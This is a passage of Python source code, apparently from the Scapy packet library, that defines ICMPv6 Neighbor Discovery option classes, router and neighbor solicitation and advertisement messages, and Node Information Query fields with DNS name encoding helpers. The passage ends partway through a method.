1852class ICMPv6NDOptDstLLAddr(ICMPv6NDOptSrcLLAddr):
1853    name = "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address"
1854    type = 2
1855
1856
1857class ICMPv6NDOptPrefixInfo(_ICMPv6NDGuessPayload, Packet):
1858    name = "ICMPv6 Neighbor Discovery Option - Prefix Information"
1859    fields_desc = [ByteField("type", 3),
1860                   ByteField("len", 4),
1861                   ByteField("prefixlen", 64),
1862                   BitField("L", 1, 1),
1863                   BitField("A", 1, 1),
1864                   BitField("R", 0, 1),
1865                   BitField("res1", 0, 5),
1866                   XIntField("validlifetime", 0xffffffff),
1867                   XIntField("preferredlifetime", 0xffffffff),
1868                   XIntField("res2", 0x00000000),
1869                   IP6Field("prefix", "::")]
1870
1871    def mysummary(self):
1872        return self.sprintf("%name% %prefix%/%prefixlen% "
1873                            "On-link %L% Autonomous Address %A% "
1874                            "Router Address %R%")
1875
1876# TODO: We should also limit the size of included packet to something
1877# like (initiallen - 40 - 2)
1878
1879
1880class TruncPktLenField(PacketLenField):
1881    def i2m(self, pkt, x):
1882        s = bytes(x)
1883        tmp_len = len(s)
1884        return s[:tmp_len - (tmp_len % 8)]
1885
1886    def i2len(self, pkt, i):
1887        return len(self.i2m(pkt, i))
1888
1889
1890class ICMPv6NDOptRedirectedHdr(_ICMPv6NDGuessPayload, Packet):
1891    name = "ICMPv6 Neighbor Discovery Option - Redirected Header"
1892    fields_desc = [ByteField("type", 4),
1893                   FieldLenField("len", None, length_of="pkt", fmt="B",
1894                                 adjust=lambda pkt, x: (x + 8) // 8),
1895                   MayEnd(StrFixedLenField("res", b"\x00" * 6, 6)),
1896                   TruncPktLenField("pkt", b"", IPv6,
1897                                    length_from=lambda pkt: 8 * pkt.len - 8)]
1898
1899# See which value should be used for default MTU instead of 1280
1900
1901
1902class ICMPv6NDOptMTU(_ICMPv6NDGuessPayload, Packet):
1903    name = "ICMPv6 Neighbor Discovery Option - MTU"
1904    fields_desc = [ByteField("type", 5),
1905                   ByteField("len", 1),
1906                   XShortField("res", 0),
1907                   IntField("mtu", 1280)]
1908
1909    def mysummary(self):
1910        return self.sprintf("%name% %mtu%")
1911
1912
1913class ICMPv6NDOptShortcutLimit(_ICMPv6NDGuessPayload, Packet):  # RFC 2491
1914    name = "ICMPv6 Neighbor Discovery Option - NBMA Shortcut Limit"
1915    fields_desc = [ByteField("type", 6),
1916                   ByteField("len", 1),
1917                   ByteField("shortcutlim", 40),  # XXX
1918                   ByteField("res1", 0),
1919                   IntField("res2", 0)]
1920
1921
1922class ICMPv6NDOptAdvInterval(_ICMPv6NDGuessPayload, Packet):
1923    name = "ICMPv6 Neighbor Discovery - Interval Advertisement"
1924    fields_desc = [ByteField("type", 7),
1925                   ByteField("len", 1),
1926                   ShortField("res", 0),
1927                   IntField("advint", 0)]
1928
1929    def mysummary(self):
1930        return self.sprintf("%name% %advint% milliseconds")
1931
1932
1933class ICMPv6NDOptHAInfo(_ICMPv6NDGuessPayload, Packet):
1934    name = "ICMPv6 Neighbor Discovery - Home Agent Information"
1935    fields_desc = [ByteField("type", 8),
1936                   ByteField("len", 1),
1937                   ShortField("res", 0),
1938                   ShortField("pref", 0),
1939                   ShortField("lifetime", 1)]
1940
1941    def mysummary(self):
1942        return self.sprintf("%name% %pref% %lifetime% seconds")
1943
1944# type 9  : See ICMPv6NDOptSrcAddrList class below in IND (RFC 3122) support
1945
1946# type 10 : See ICMPv6NDOptTgtAddrList class below in IND (RFC 3122) support
1947
1948
1949class ICMPv6NDOptIPAddr(_ICMPv6NDGuessPayload, Packet):  # RFC 4068
1950    name = "ICMPv6 Neighbor Discovery - IP Address Option (FH for MIPv6)"
1951    fields_desc = [ByteField("type", 17),
1952                   ByteField("len", 3),
1953                   ByteEnumField("optcode", 1, {1: "Old Care-Of Address",
1954                                                2: "New Care-Of Address",
1955                                                3: "NAR's IP address"}),
1956                   ByteField("plen", 64),
1957                   IntField("res", 0),
1958                   IP6Field("addr", "::")]
1959
1960
1961class ICMPv6NDOptNewRtrPrefix(_ICMPv6NDGuessPayload, Packet):  # RFC 4068
1962    name = "ICMPv6 Neighbor Discovery - New Router Prefix Information Option (FH for MIPv6)"  # noqa: E501
1963    fields_desc = [ByteField("type", 18),
1964                   ByteField("len", 3),
1965                   ByteField("optcode", 0),
1966                   ByteField("plen", 64),
1967                   IntField("res", 0),
1968                   IP6Field("prefix", "::")]
1969
1970
1971_rfc4068_lla_optcode = {0: "Wildcard requesting resolution for all nearby AP",
1972                        1: "LLA for the new AP",
1973                        2: "LLA of the MN",
1974                        3: "LLA of the NAR",
1975                        4: "LLA of the src of TrSolPr or PrRtAdv msg",
1976                        5: "AP identified by LLA belongs to current iface of router",  # noqa: E501
1977                        6: "No preifx info available for AP identified by the LLA",  # noqa: E501
1978                        7: "No fast handovers support for AP identified by the LLA"}  # noqa: E501
1979
1980
1981class ICMPv6NDOptLLA(_ICMPv6NDGuessPayload, Packet):     # RFC 4068
1982    name = "ICMPv6 Neighbor Discovery - Link-Layer Address (LLA) Option (FH for MIPv6)"  # noqa: E501
1983    fields_desc = [ByteField("type", 19),
1984                   ByteField("len", 1),
1985                   ByteEnumField("optcode", 0, _rfc4068_lla_optcode),
1986                   MACField("lla", ETHER_ANY)]  # We only support ethernet
1987
1988
1989class ICMPv6NDOptMAP(_ICMPv6NDGuessPayload, Packet):     # RFC 4140
1990    name = "ICMPv6 Neighbor Discovery - MAP Option"
1991    fields_desc = [ByteField("type", 23),
1992                   ByteField("len", 3),
1993                   BitField("dist", 1, 4),
1994                   BitField("pref", 15, 4),  # highest availability
1995                   BitField("R", 1, 1),
1996                   BitField("res", 0, 7),
1997                   IntField("validlifetime", 0xffffffff),
1998                   IP6Field("addr", "::")]
1999
2000
2001class _IP6PrefixField(IP6Field):
2002    __slots__ = ["length_from"]
2003
2004    def __init__(self, name, default):
2005        IP6Field.__init__(self, name, default)
2006        self.length_from = lambda pkt: 8 * (pkt.len - 1)
2007
2008    def addfield(self, pkt, s, val):
2009        return s + self.i2m(pkt, val)
2010
2011    def getfield(self, pkt, s):
2012        tmp_len = self.length_from(pkt)
2013        p = s[:tmp_len]
2014        if tmp_len < 16:
2015            p += b'\x00' * (16 - tmp_len)
2016        return s[tmp_len:], self.m2i(pkt, p)
2017
2018    def i2len(self, pkt, x):
2019        return len(self.i2m(pkt, x))
2020
2021    def i2m(self, pkt, x):
2022        tmp_len = pkt.len
2023
2024        if x is None:
2025            x = "::"
2026            if tmp_len is None:
2027                tmp_len = 1
2028        x = inet_pton(socket.AF_INET6, x)
2029
2030        if tmp_len is None:
2031            return x
2032        if tmp_len in [0, 1]:
2033            return b""
2034        if tmp_len in [2, 3]:
2035            return x[:8 * (tmp_len - 1)]
2036
2037        return x + b'\x00' * 8 * (tmp_len - 3)
2038
2039
2040class ICMPv6NDOptRouteInfo(_ICMPv6NDGuessPayload, Packet):  # RFC 4191
2041    name = "ICMPv6 Neighbor Discovery Option - Route Information Option"
2042    fields_desc = [ByteField("type", 24),
2043                   FieldLenField("len", None, length_of="prefix", fmt="B",
2044                                 adjust=lambda pkt, x: x // 8 + 1),
2045                   ByteField("plen", None),
2046                   BitField("res1", 0, 3),
2047                   BitEnumField("prf", 0, 2, icmp6ndraprefs),
2048                   BitField("res2", 0, 3),
2049                   IntField("rtlifetime", 0xffffffff),
2050                   _IP6PrefixField("prefix", None)]
2051
2052    def mysummary(self):
2053        return self.sprintf("%name% %prefix%/%plen% Preference %prf%")
2054
2055
2056class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet):  # RFC 5006
2057    name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option"
2058    fields_desc = [ByteField("type", 25),
2059                   FieldLenField("len", None, count_of="dns", fmt="B",
2060                                 adjust=lambda pkt, x: 2 * x + 1),
2061                   ShortField("res", None),
2062                   IntField("lifetime", 0xffffffff),
2063                   IP6ListField("dns", [],
2064                                length_from=lambda pkt: 8 * (pkt.len - 1))]
2065
2066    def mysummary(self):
2067        return self.sprintf("%name% ") + ", ".join(self.dns)
2068
2069
2070class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet):  # RFC 5175 (prev. 5075)
2071    name = "ICMPv6 Neighbor Discovery Option - Expanded Flags Option"
2072    fields_desc = [ByteField("type", 26),
2073                   ByteField("len", 1),
2074                   BitField("res", 0, 48)]
2075
2076# As required in Sect 8. of RFC 3315, Domain Names must be encoded as
2077# described in section 3.1 of RFC 1035
2078# XXX Label should be at most 63 octets in length : we do not enforce it
2079#     Total length of domain should be 255 : we do not enforce it either
2080
2081
2082class DomainNameListField(StrLenField):
2083    __slots__ = ["padded"]
2084    islist = 1
2085    padded_unit = 8
2086
2087    def __init__(self, name, default, length_from=None, padded=False):  # noqa: E501
2088        self.padded = padded
2089        StrLenField.__init__(self, name, default, length_from=length_from)
2090
2091    def i2len(self, pkt, x):
2092        return len(self.i2m(pkt, x))
2093
2094    def i2h(self, pkt, x):
2095        if not x:
2096            return []
2097        return x
2098
2099    def m2i(self, pkt, x):
2100        x = plain_str(x)  # Decode bytes to string
2101        res = []
2102        while x:
2103            # Get a name until \x00 is reached
2104            cur = []
2105            while x and ord(x[0]) != 0:
2106                tmp_len = ord(x[0])
2107                cur.append(x[1:tmp_len + 1])
2108                x = x[tmp_len + 1:]
2109            if self.padded:
2110                # Discard following \x00 in padded mode
2111                if len(cur):
2112                    res.append(".".join(cur) + ".")
2113            else:
2114                # Store the current name
2115                res.append(".".join(cur) + ".")
2116            if x and ord(x[0]) == 0:
2117                x = x[1:]
2118        return res
2119
2120    def i2m(self, pkt, x):
2121        def conditionalTrailingDot(z):
2122            if z and orb(z[-1]) == 0:
2123                return z
2124            return z + b'\x00'
2125        # Build the encode names
2126        tmp = ([chb(len(z)) + z.encode("utf8") for z in y.split('.')] for y in x)  # Also encode string to bytes  # noqa: E501
2127        ret_string = b"".join(conditionalTrailingDot(b"".join(x)) for x in tmp)
2128
2129        # In padded mode, add some \x00 bytes
2130        if self.padded and not len(ret_string) % self.padded_unit == 0:
2131            ret_string += b"\x00" * (self.padded_unit - len(ret_string) % self.padded_unit)  # noqa: E501
2132
2133        return ret_string
2134
2135
2136class ICMPv6NDOptDNSSL(_ICMPv6NDGuessPayload, Packet):  # RFC 6106
2137    name = "ICMPv6 Neighbor Discovery Option - DNS Search List Option"
2138    fields_desc = [ByteField("type", 31),
2139                   FieldLenField("len", None, length_of="searchlist", fmt="B",
2140                                 adjust=lambda pkt, x: 1 + x // 8),
2141                   ShortField("res", None),
2142                   IntField("lifetime", 0xffffffff),
2143                   DomainNameListField("searchlist", [],
2144                                       length_from=lambda pkt: 8 * pkt.len - 8,
2145                                       padded=True)
2146                   ]
2147
2148    def mysummary(self):
2149        return self.sprintf("%name% ") + ", ".join(self.searchlist)
2150
2151
2152class ICMPv6NDOptCaptivePortal(_ICMPv6NDGuessPayload, Packet):  # RFC 8910
2153    name = "ICMPv6 Neighbor Discovery Option - Captive-Portal Option"
2154    fields_desc = [ByteField("type", 37),
2155                   FieldLenField("len", None, length_of="URI", fmt="B",
2156                                 adjust=lambda pkt, x: (2 + x) // 8),
2157                   ICMPv6NDOptDataField("URI", "", strip_zeros=True,
2158                                        length_from=lambda pkt:
2159                                        8 * max(pkt.len, 1) - 2)]
2160
2161    def mysummary(self):
2162        return self.sprintf("%name% %URI%")
2163
2164
2165class _PREF64(IP6Field):
2166    def addfield(self, pkt, s, val):
2167        return s + self.i2m(pkt, val)[:12]
2168
2169    def getfield(self, pkt, s):
2170        return s[12:], self.m2i(pkt, s[:12] + b"\x00" * 4)
2171
2172
2173class ICMPv6NDOptPREF64(_ICMPv6NDGuessPayload, Packet):  # RFC 8781
2174    name = "ICMPv6 Neighbor Discovery Option - PREF64 Option"
2175    fields_desc = [ByteField("type", 38),
2176                   ByteField("len", 2),
2177                   BitField("scaledlifetime", 0, 13),
2178                   BitEnumField("plc", 0, 3,
2179                                ["/96", "/64", "/56", "/48", "/40", "/32"]),
2180                   _PREF64("prefix", "::")]
2181
2182    def mysummary(self):
2183        plc = self.sprintf("%plc%") if self.plc < 6 else f"[invalid PLC({self.plc})]"
2184        return self.sprintf("%name% %prefix%") + plc
2185
2186# End of ICMPv6 Neighbor Discovery Options.
2187
2188
2189class ICMPv6ND_RS(_ICMPv6NDGuessPayload, _ICMPv6):
2190    name = "ICMPv6 Neighbor Discovery - Router Solicitation"
2191    fields_desc = [ByteEnumField("type", 133, icmp6types),
2192                   ByteField("code", 0),
2193                   XShortField("cksum", None),
2194                   IntField("res", 0)]
2195    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::2", "hlim": 255}}
2196
2197
2198class ICMPv6ND_RA(_ICMPv6NDGuessPayload, _ICMPv6):
2199    name = "ICMPv6 Neighbor Discovery - Router Advertisement"
2200    fields_desc = [ByteEnumField("type", 134, icmp6types),
2201                   ByteField("code", 0),
2202                   XShortField("cksum", None),
2203                   ByteField("chlim", 0),
2204                   BitField("M", 0, 1),
2205                   BitField("O", 0, 1),
2206                   BitField("H", 0, 1),
2207                   BitEnumField("prf", 1, 2, icmp6ndraprefs),  # RFC 4191
2208                   BitField("P", 0, 1),
2209                   BitField("res", 0, 2),
2210                   ShortField("routerlifetime", 1800),
2211                   IntField("reachabletime", 0),
2212                   IntField("retranstimer", 0)]
2213    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2214
2215    def answers(self, other):
2216        return isinstance(other, ICMPv6ND_RS)
2217
2218    def mysummary(self):
2219        return self.sprintf("%name% Lifetime %routerlifetime% "
2220                            "Hop Limit %chlim% Preference %prf% "
2221                            "Managed %M% Other %O% Home %H%")
2222
2223
2224class ICMPv6ND_NS(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
2225    name = "ICMPv6 Neighbor Discovery - Neighbor Solicitation"
2226    fields_desc = [ByteEnumField("type", 135, icmp6types),
2227                   ByteField("code", 0),
2228                   XShortField("cksum", None),
2229                   IntField("res", 0),
2230                   IP6Field("tgt", "::")]
2231    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2232
2233    def mysummary(self):
2234        return self.sprintf("%name% (tgt: %tgt%)")
2235
2236    def hashret(self):
2237        return bytes_encode(self.tgt) + self.payload.hashret()
2238
2239
2240class ICMPv6ND_NA(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
2241    name = "ICMPv6 Neighbor Discovery - Neighbor Advertisement"
2242    fields_desc = [ByteEnumField("type", 136, icmp6types),
2243                   ByteField("code", 0),
2244                   XShortField("cksum", None),
2245                   BitField("R", 1, 1),
2246                   BitField("S", 0, 1),
2247                   BitField("O", 1, 1),
2248                   XBitField("res", 0, 29),
2249                   IP6Field("tgt", "::")]
2250    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2251
2252    def mysummary(self):
2253        return self.sprintf("%name% (tgt: %tgt%)")
2254
2255    def hashret(self):
2256        return bytes_encode(self.tgt) + self.payload.hashret()
2257
2258    def answers(self, other):
2259        return isinstance(other, ICMPv6ND_NS) and self.tgt == other.tgt
2260
2261# associated possible options : target link-layer option, Redirected header
2262
2263
2264class ICMPv6ND_Redirect(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
2265    name = "ICMPv6 Neighbor Discovery - Redirect"
2266    fields_desc = [ByteEnumField("type", 137, icmp6types),
2267                   ByteField("code", 0),
2268                   XShortField("cksum", None),
2269                   XIntField("res", 0),
2270                   IP6Field("tgt", "::"),
2271                   IP6Field("dst", "::")]
2272    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2273
2274
2275#                ICMPv6 Inverse Neighbor Discovery (RFC 3122)               #
2276
2277class ICMPv6NDOptSrcAddrList(_ICMPv6NDGuessPayload, Packet):
2278    name = "ICMPv6 Inverse Neighbor Discovery Option - Source Address List"
2279    fields_desc = [ByteField("type", 9),
2280                   FieldLenField("len", None, count_of="addrlist", fmt="B",
2281                                 adjust=lambda pkt, x: 2 * x + 1),
2282                   StrFixedLenField("res", b"\x00" * 6, 6),
2283                   IP6ListField("addrlist", [],
2284                                length_from=lambda pkt: 8 * (pkt.len - 1))]
2285
2286
2287class ICMPv6NDOptTgtAddrList(ICMPv6NDOptSrcAddrList):
2288    name = "ICMPv6 Inverse Neighbor Discovery Option - Target Address List"
2289    type = 10
2290
2291
2292# RFC3122
2293# Options requises : source lladdr et target lladdr
2294# Autres options valides : source address list, MTU
2295# - Comme precise dans le document, il serait bien de prendre l'adresse L2
2296#   demandee dans l'option requise target lladdr et l'utiliser au niveau
2297#   de l'adresse destination ethernet si aucune adresse n'est precisee
2298# - ca semble pas forcement pratique si l'utilisateur doit preciser toutes
2299#   les options.
2300# Ether() must use the target lladdr as destination
2301class ICMPv6ND_INDSol(_ICMPv6NDGuessPayload, _ICMPv6):
2302    name = "ICMPv6 Inverse Neighbor Discovery Solicitation"
2303    fields_desc = [ByteEnumField("type", 141, icmp6types),
2304                   ByteField("code", 0),
2305                   XShortField("cksum", None),
2306                   XIntField("reserved", 0)]
2307    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2308
2309# Options requises :  target lladdr, target address list
2310# Autres options valides : MTU
2311
2312
2313class ICMPv6ND_INDAdv(_ICMPv6NDGuessPayload, _ICMPv6):
2314    name = "ICMPv6 Inverse Neighbor Discovery Advertisement"
2315    fields_desc = [ByteEnumField("type", 142, icmp6types),
2316                   ByteField("code", 0),
2317                   XShortField("cksum", None),
2318                   XIntField("reserved", 0)]
2319    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2320
2321
2322###############################################################################
2323# ICMPv6 Node Information Queries (RFC 4620)
2324###############################################################################
2325
2326# [ ] Add automatic destination address computation using computeNIGroupAddr
2327#     in IPv6 class (Scapy6 modification when integrated) if :
2328#     - it is not provided
2329#     - upper layer is ICMPv6NIQueryName() with a valid value
2330# [ ] Try to be liberal in what we accept as internal values for _explicit_
2331#     DNS elements provided by users. Any string should be considered
2332#     valid and kept like it has been provided. At the moment, i2repr() will
2333#     crash on many inputs
2334# [ ] Do the documentation
2335# [ ] Add regression tests
2336# [ ] Perform test against real machines (NOOP reply is proof of implementation).  # noqa: E501
2337# [ ] Check if there are differences between different stacks. Among *BSD,
2338#     with others.
2339# [ ] Deal with flags in a consistent way.
2340# [ ] Implement compression in names2dnsrepr() and decompresiion in
2341#     dnsrepr2names(). Should be deactivable.
2342
2343icmp6_niqtypes = {0: "NOOP",
2344                  2: "Node Name",
2345                  3: "IPv6 Address",
2346                  4: "IPv4 Address"}
2347
2348
2349class _ICMPv6NIHashret:
2350    def hashret(self):
2351        return bytes_encode(self.nonce)
2352
2353
2354class _ICMPv6NIAnswers:
2355    def answers(self, other):
2356        return self.nonce == other.nonce
2357
2358# Buggy; always returns the same value during a session
2359
2360
2361class NonceField(StrFixedLenField):
2362    def __init__(self, name, default=None):
2363        StrFixedLenField.__init__(self, name, default, 8)
2364        if default is None:
2365            self.default = self.randval()
2366
2367
2368@conf.commands.register
2369def computeNIGroupAddr(name):
2370    """Compute the NI group Address. Can take a FQDN as input parameter"""
2371    name = name.lower().split(".")[0]
2372    record = chr(len(name)) + name
2373    h = md5(record.encode("utf8"))
2374    h = h.digest()
2375    addr = "ff02::2:%2x%2x:%2x%2x" % struct.unpack("BBBB", h[:4])
2376    return addr
2377
2378
2379# Here is the deal. First, that protocol is a piece of shit. Then, we
2380# provide 4 classes for the different kinds of Requests (one for every
2381# valid qtype: NOOP, Node Name, IPv6@, IPv4@). They all share the same
2382# data field class that is made to be smart by guessing the specific
2383# type of value provided :
2384#
2385# - IPv6 if acceptable for inet_pton(AF_INET6, ): code is set to 0,
2386#   if not overridden by user
2387# - IPv4 if acceptable for inet_pton(AF_INET,  ): code is set to 2,
2388#   if not overridden
2389# - Name in the other cases: code is set to 0, if not overridden by user
2390#
2391# Internal storage, is not only the value, but the a pair providing
2392# the type and the value (1 is IPv6@, 1 is Name or string, 2 is IPv4@)
2393#
2394# Note : I merged getfield() and m2i(). m2i() should not be called
2395#        directly anyway. Same remark for addfield() and i2m()
2396#
2397# -- arno
2398
2399# "The type of information present in the Data field of a query is
2400#  declared by the ICMP Code, whereas the type of information in a
2401#  Reply is determined by the Qtype"
2402
2403def names2dnsrepr(x):
2404    """
2405    Take as input a list of DNS names or a single DNS name
2406    and encode it in DNS format (with possible compression)
2407    If a string that is already a DNS name in DNS format
2408    is passed, it is returned unmodified. Result is a string.
2409    !!!  At the moment, compression is not implemented  !!!
2410    """
2411
2412    if isinstance(x, bytes):
2413        if x and x[-1:] == b'\x00':  # stupid heuristic
2414            return x
2415        x = [x]
2416
2417    res = []
2418    for n in x:
2419        termin = b"\x00"
2420        if n.count(b'.') == 0:  # single-component gets one more
2421            termin += b'\x00'
2422        n = b"".join(chb(len(y)) + y for y in n.split(b'.')) + termin
2423        res.append(n)
2424    return b"".join(res)
2425
2426
2427def dnsrepr2names(x):
2428    """
2429    Take as input a DNS encoded string (possibly compressed)
2430    and returns a list of DNS names contained in it.
2431    If provided string is already in printable format
2432    (does not end with a null character, a one element list
2433    is returned). Result is a list.
2434    """
2435    res = []
2436    cur = b""
2437    while x:
2438        tmp_len = orb(x[0])
2439        x = x[1:]
2440        if not tmp_len:
2441            if cur and cur[-1:] == b'.':
2442                cur = cur[:-1]
2443            res.append(cur)
2444            cur = b""
2445            if x and orb(x[0]) == 0:  # single component
2446                x = x[1:]
2447            continue
2448        if tmp_len & 0xc0:  # XXX TODO : work on that -- arno
2449            raise Exception("DNS message can't be compressed at this point!")
2450        cur += x[:tmp_len] + b"."
2451        x = x[tmp_len:]
2452    return res
2453
2454
2455class NIQueryDataField(StrField):
2456    def __init__(self, name, default):
2457        StrField.__init__(self, name, default)
2458
2459    def i2h(self, pkt, x):
2460        if x is None:
2461            return x
2462        t, val = x
2463        if t == 1:
2464            val = dnsrepr2names(val)[0]
2465        return val
2466
2467    def h2i(self, pkt, x):
2468        if x is tuple and isinstance(x[0], int):
2469            return x
2470
2471        # Try IPv6
2472        try:
2473            inet_pton(socket.AF_INET6, x.decode())
2474            return (0, x.decode())
2475        except Exception:
2476            pass
2477        # Try IPv4
2478        try:
2479            inet_pton(socket.AF_INET, x.decode())
2480            return (2, x.decode())
2481        except Exception:
2482            pass
2483        # Try DNS
2484        if x is None:
2485            x = b""
2486        x = names2dnsrepr(x)
2487        return (1, x)
2488
2489    def i2repr(self, pkt, x):
2490        t, val = x
2491        if t == 1:  # DNS Name
2492            # we don't use dnsrepr2names() to deal with
2493            # possible weird data extracted info
2494            res = []
2495            while val:
2496                tmp_len = orb(val[0])
2497                val = val[1:]
2498                if tmp_len == 0:
2499                    break
2500                res.append(plain_str(val[:tmp_len]) + ".")
2501                val = val[tmp_len:]
2502            tmp = "".join(res)
2503            if tmp and tmp[-1] == '.':
2504                tmp = tmp[:-1]
2505            return tmp
2506        return repr(val)
2507
2508    def getfield(self, pkt, s):
2509        qtype = getattr(pkt, "qtype")
2510        if qtype == 0:  # NOOP
2511            return s, (0, b"")
2512        else:
2513            code = getattr(pkt, "code")
2514            if code == 0:   # IPv6 Addr
2515                return s[16:], (0, inet_ntop(socket.AF_INET6, s[:16]))
2516            elif code == 2:  # IPv4 Addr
2517                return s[4:], (2, inet_ntop(socket.AF_INET, s[:4]))
2518            else:           # Name or Unknown
2519                return b"", (1, s)
2520
2521    def addfield(self, pkt, s, val):
2522        if ((isinstance(val, tuple) and val[1] is None) or
2523                val is None):
2524            val = (1, b"")
2525        t = val[0]
2526        if t == 1:
2527            return s + val[1]
2528        elif t == 0:
2529            return s + inet_pton(socket.AF_INET6, val[1])
2530        else:
2531            return s + inet_pton(socket.AF_INET, val[1])
2532
2533
2534class NIQueryCodeField(ByteEnumField):
2535    def i2m(self, pkt, x):
2536        if x is None:
2537            d = pkt.getfieldval("data")
2538            if d is None:
2539                return 1
2540            elif d[0] == 0:  # IPv6 address
2541                return 0
2542            elif d[0] == 1:  # Name
2543                return 1
2544            elif d[0] == 2:  # IPv4 address
2545                return 2
2546            else:
2547                return 1
2548        return x
2549
2550
2551_niquery_code = {0: "IPv6 Query", 1: "Name Query", 2: "IPv4 Query"}
2552
2553# _niquery_flags = {  2: "All unicast addresses", 4: "IPv4 addresses",
2554#                     8: "Link-local addresses", 16: "Site-local addresses",
2555#                    32: "Global addresses" }
2556
2557# "This NI type has no defined flags and never has a Data Field". Used
2558# to know if the destination is up and implements NI protocol.
2559
2560
2561class ICMPv6NIQueryNOOP(_ICMPv6NIHashret, _ICMPv6):
2562    name = "ICMPv6 Node Information Query - NOOP Query"
2563    fields_desc = [ByteEnumField("type", 139, icmp6types),
2564                   NIQueryCodeField("code", None, _niquery_code),
2565                   XShortField("cksum", None),
2566                   ShortEnumField("qtype", 0, icmp6_niqtypes),
2567                   BitField("unused", 0, 10),
2568                   FlagsField("flags", 0, 6, "TACLSG"),
2569                   NonceField("nonce", None),
2570                   NIQueryDataField("data", None)]
2571
2572
2573class ICMPv6NIQueryName(ICMPv6NIQueryNOOP):
2574    name = "ICMPv6 Node Information Query - IPv6 Name Query"
2575    qtype = 2
2576
2577# We ask for the IPv6 address of the peer
2578
2579
2580class ICMPv6NIQueryIPv6(ICMPv6NIQueryNOOP):
2581    name = "ICMPv6 Node Information Query - IPv6 Address Query"
2582    qtype = 3
2583    flags = 0x3E
2584
2585
2586class ICMPv6NIQueryIPv4(ICMPv6NIQueryNOOP):
2587    name = "ICMPv6 Node Information Query - IPv4 Address Query"
2588    qtype = 4
2589
2590
2591_nireply_code = {0: "Successful Reply",
2592                 1: "Response Refusal",
2593                 3: "Unknown query type"}
2594
2595_nireply_flags = {1: "Reply set incomplete",
2596                  2: "All unicast addresses",
2597                  4: "IPv4 addresses",
2598                  8: "Link-local addresses",
2599                  16: "Site-local addresses",
2600                  32: "Global addresses"}
2601
2602# Internal repr is one of those :
2603# (0, "some string") : unknown qtype value are mapped to that one
2604# (3, [ (ttl, ip6), ... ])
2605# (4, [ (ttl, ip4), ... ])
2606# (2, [ttl, dns_names]) : dns_names is one string that contains
2607#     all the DNS names. Internally it is kept ready to be sent
2608#     (undissected). i2repr() decode it for user. This is to
2609#     make build after dissection bijective.
2610#
2611# I also merged getfield() and m2i(), and addfield() and i2m().
2612
2613
2614class NIReplyDataField(StrField):
2615
2616    def i2h(self, pkt, x):
2617        if x is None:
2618            return x
2619        t, val = x
2620        if t == 2:
2621            ttl, dnsnames = val
2622            val = [ttl] + dnsrepr2names(dnsnames)
2623        return val
2624
2625    def h2i(self, pkt, x):
2626        qtype = 0  # We will decode it as string if not
2627        # overridden through 'qtype' in pkt
2628
2629        # No user hint, let's use 'qtype' value for that purpose
2630        if not isinstance(x, tuple):
2631            if pkt is not None:
2632                qtype = pkt.qtype
2633        else:
2634            qtype = x[0]
2635            x = x[1]
2636
2637        # From that point on, x is the value (second element of the tuple)
2638
2639        if qtype == 2:  # DNS name
2640            if isinstance(x, (str, bytes)):  # listify the string
2641                x = [x]
2642            if isinstance(x, list):
2643                x = [val.encode() if isinstance(val, str) else val for val in x]  # noqa: E501
2644            if x and isinstance(x[0], int):
2645                ttl = x[0]
2646                names = x[1:]
2647            else:
2648                ttl = 0
2649                names = x
2650            return (2, [ttl, names2dnsrepr(names)])
2651
2652        elif qtype in [3, 4]:  # IPv4 or IPv6 addr
2653            if not isinstance(x, list):
2654                x = [x]  # User directly provided an IP, instead of list
2655
2656            def fixvalue(x):
2657                # List elements are not tuples, user probably
2658                # omitted ttl value : we will use 0 instead
2659                if not isinstance(x, tuple):
2660                    x = (0, x)
2661                # Decode bytes
2662                if isinstance(x[1], bytes):
2663                    x = (x[0], x[1].decode())
2664                return x
2665
2666            return (qtype, [fixvalue(d) for d in x])
2667
2668        return (qtype, x)
2669
2670    def addfield(self, pkt, s, val):
2671        t, tmp = val
2672        if tmp is None:
2673            tmp = b""
2674        if t == 2:
2675            ttl, dnsstr = tmp
2676            return s + struct.pack("!I", ttl) + dnsstr
2677        elif t == 3:
2678            return s + b"".join(map(lambda x_y1: struct.pack("!I", x_y1[0]) + inet_pton(socket.AF_INET6, x_y1[1]), tmp))  # noqa: E501
2679        elif t == 4:
2680            return s + b"".join(map(lambda x_y2: struct.pack("!I", x_y2[0]) + inet_pton(socket.AF_INET, x_y2[1]), tmp))  # noqa: E501
2681        else:
2682            return s + tmp
2683
2684    def getfield(self, pkt, s):
2685        code = getattr(pkt, "code")
2686        if code != 0:
2687            return s, (0, b"")
2688
2689        qtype = getattr(pkt, "qtype")
2690        if qtype == 0:  # NOOP
2691            return s, (0, b"")
2692
2693        elif qtype == 2:
2694            if len(s) < 4:
2695                return s, (0, b"")
2696            ttl = struct.unpack("!I", s[:4])[0]
2697            return b"", (2, [ttl, s[4:]])
2698
2699        elif qtype == 3:  # IPv6 addresses with TTLs
2700            # XXX TODO : get the real length
2701            res = []
2702            while len(s) >= 20:  # 4 + 16
2703                ttl = struct.unpack("!I", s[:4])[0]
2704                ip = inet_ntop(socket.AF_INET6, s[4:20])
2705                res.append((ttl, ip))
2706                s = s[20:]
2707            return s, (3, res)
2708
2709        elif qtype == 4:  # IPv4 addresses with TTLs
2710            # XXX TODO : get the real length
2711            res = []
2712            while len(s) >= 8:  # 4 + 4
2713                ttl = struct.unpack("!I", s[:4])[0]
2714                ip = inet_ntop(socket.AF_INET, s[4:8])
2715                res.append((ttl, ip))
2716                s = s[8:]
2717            return s, (4, res)
2718        else:
2719            # XXX TODO : implement me and deal with real length
2720            return b"", (0, s)
2721
2722    def i2repr(self, pkt, x):
2723        if x is None:
2724            return "[]"
2725
2726        if isinstance(x, tuple) and len(x) == 2:
